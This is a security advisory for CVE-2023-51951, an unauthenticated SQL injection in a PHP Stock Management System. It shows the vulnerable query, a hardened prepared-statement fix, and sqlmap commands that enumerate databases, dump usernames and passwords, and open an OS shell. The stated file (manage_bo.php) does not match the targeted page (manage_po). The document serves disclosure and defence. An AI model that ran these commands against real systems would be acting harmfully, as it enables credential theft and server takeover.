| | |
|---|---|
| Vendor | |
| Product | Stock Management System |
| Affected Version(s) | 1 and probably prior |
| Tested Version(s) | 1 |
| Vendor Notification | 18 December 2023 |
| Advisory Publication | 18 December 2023 [without technical details] |
| Vendor Fix | N/A |
| Public Disclosure | 18 December 2023 |
| Latest Modification | 18 December 2023 |
| CVE Identifier | CVE-2023-51951 |
| Product Description | This is a Stock Management System in PHP and MySQL Database that provides an online and automated platform for shops or businesses. |
| Credits | Josué Cruz Mier, Security Researcher & Penetration Tester @wizlynx group |
| SQL Injection | | | |
|---|---|---|---|
| Severity: Critical | CVSS Score: 9.8 | CWE-ID: CWE-89 | Status: Open |

Vulnerability Description

The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0. An SQL injection occurs when a value originating from the client's request is used within a SQL query without proper sanitisation. This could allow attackers to execute arbitrary SQL code and steal data, or to use the additional functionality of the database server to take control of more server components.

| CVSS Base Score | | | |
|---|---|---|---|
| Attack Vector | Network | Scope | Changed |
| Attack Complexity | Low | Confidentiality Impact | High |
| Privileges Required | None | Integrity Impact | High |
| User Interaction | None | Availability Impact | High |
Source code: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
Vulnerability location: /sms/admin/purchase_order/manage_bo.php, id parameter
Line 3 of manage_bo.php builds and executes a SQL query from input that comes from an untrusted source, specifically the 'id' request parameter, which is interpolated directly into the query string. This allows an attacker to modify the statement's meaning or to execute arbitrary SQL commands.

```php
<?php
if(isset($_GET['id'])){
    // Vulnerable: the raw 'id' parameter is interpolated into the SQL string
    // with no validation or parameter binding.
    $qry = $conn->query("SELECT p.*,s.name as supplier FROM purchase_order_list p inner join supplier_list s on p.supplier_id = s.id where p.id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        // Every column of the row is copied into a variable of the same name.
        foreach($qry->fetch_array() as $k => $v){
            $$k = $v;
        }
    }
}
?>
... omitted for brevity ...
```
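For comparison, the following is a hardened replacement for the lookup above, added here as an example and not part of the project's code. It assumes `$conn` is the project's existing mysqli handle and that the mysqlnd driver (required for `get_result()`) is available; `parse_order_id` and `fetch_purchase_order` are names chosen for this example.

```php
<?php
// Added example, not the project's code: a hardened replacement for the
// purchase order lookup. Assumes $conn is the project's existing mysqli
// handle and that mysqlnd (needed for get_result()) is present.

// Purchase order ids are positive integers, so anything else (including the
// single-quote probe from this advisory) is rejected before any database call.
function parse_order_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Same query as the original, but the id travels as a bound integer parameter
// instead of being interpolated into the SQL text, so its value can never
// change the statement's meaning.
function fetch_purchase_order(mysqli $conn, int $id): ?array
{
    $sql = 'SELECT p.*, s.name AS supplier
            FROM purchase_order_list p
            INNER JOIN supplier_list s ON p.supplier_id = s.id
            WHERE p.id = ?';
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Replacement for the original block: the row stays in one array instead of
// being exploded into variable variables ($$k), so no column can overwrite $conn.
if (isset($_GET['id'])) {
    $id = parse_order_id($_GET['id']);
    if ($id === null) {
        http_response_code(400);
        exit('Invalid purchase order id');
    }
    $order = fetch_purchase_order($conn, $id);
}
```

With this change a request such as `id=1'` is answered with HTTP 400 before any query runs, so the error message that reveals the injection point in the original code is no longer produced.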
Sending a single quote character in the id parameter makes the application return a database error message, indicating that it is most likely vulnerable to SQL injection:
Extracting information via SQL injection Demonstration
Using sqlmap, we will automate the SQL injection exploitation to retrieve data from the database, using a technique based on the error messages returned by the application:

```shell
sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --dbs
```
The screenshot above tells us five databases are available. We will now enumerate all tables within the sms_db database:
```shell
sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db --tables
```
We can proceed to the next step which consists of extracting data within a table. As illustrated in the screenshot below, we were able to extract information from the users table:
```shell
sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db -T users -C username,password --dump
```
Additionally, we were able to upload a web shell and execute commands directly from sqlmap, as shown in the screenshot below:

```shell
sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --os-shell
```